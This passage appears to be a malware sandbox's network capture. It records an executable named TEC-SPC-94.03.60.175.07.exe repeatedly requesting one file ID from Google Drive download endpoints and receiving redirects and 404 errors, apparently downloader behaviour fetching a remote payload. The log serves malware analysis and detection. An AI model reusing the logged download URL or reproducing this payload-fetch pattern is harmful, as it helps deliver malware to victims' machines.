                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.6 | 49796 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:43 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:44 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5mzjZJ1NFRpZh4ZMqh395b73KuHDMHpEgaQDF2vwMLduOaoqCYvlMp_MYG3wjklfY-
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:44 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-cr-JOXlWaUrE5GZfAAnGbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:44 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bwbbq-OVLjkbPmULBK_Ntw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.6 | 49807 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:46 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:47 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:46 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-y0VlCuuFl7FAA96NeXOdaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.6 | 49814 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:48 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:49 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5nw7cjBzLm7BtzbEOlRDK4FZ7pAF95XnR5_6L8wV-p8HJTgEZa_18U28XVf5s1_vfv
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:49 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-FeAwgmcsX4Tmc1sGs1Y0Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:49 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FMwNlGyr2wZEBl00upDJWw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.2.6 | 49820 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:52 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:52 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-_AZ2QOMbdh1qWFmkCt7PxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.6 | 49826 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:54 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:55 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6Sosdq_AGSw5wUv9M5HRx-BKBdm8xImR4rjZnEnaFxetA17cdkb9OyEAiD8YcLOxAT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:55 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-0GQwbYS0UpQC8Y0D7-z3Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:55 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VtqkRCBbfObZNp9tzoAvhw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.2.6 | 49837 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:57 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-HfrIzqjrfJ-NTdR5RRaJ8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.2.6 | 49843 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:00 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:01 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5bUB0kABd5YNamKEYeXgAAr2_8co0-ZS7cngZwnd4-FSUPM28GCusX9jwxKZLQMMIs
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:00 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-NK0SWxPBuPpqb3kA5ZGMpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sYUFQyp9zCfNCbsbWx-IqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.2.6 | 49849 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:03 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-ihDW8fMI5mvjkdXtzuT-iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        11 | 192.168.2.6 | 49855 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:06 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4L9L_5xGIOBGxGvzwlgDuEV4sAUuS5KMFzRHVyZP3o7EVe1bHCElAeMdUyCGbR4kdT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:06 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
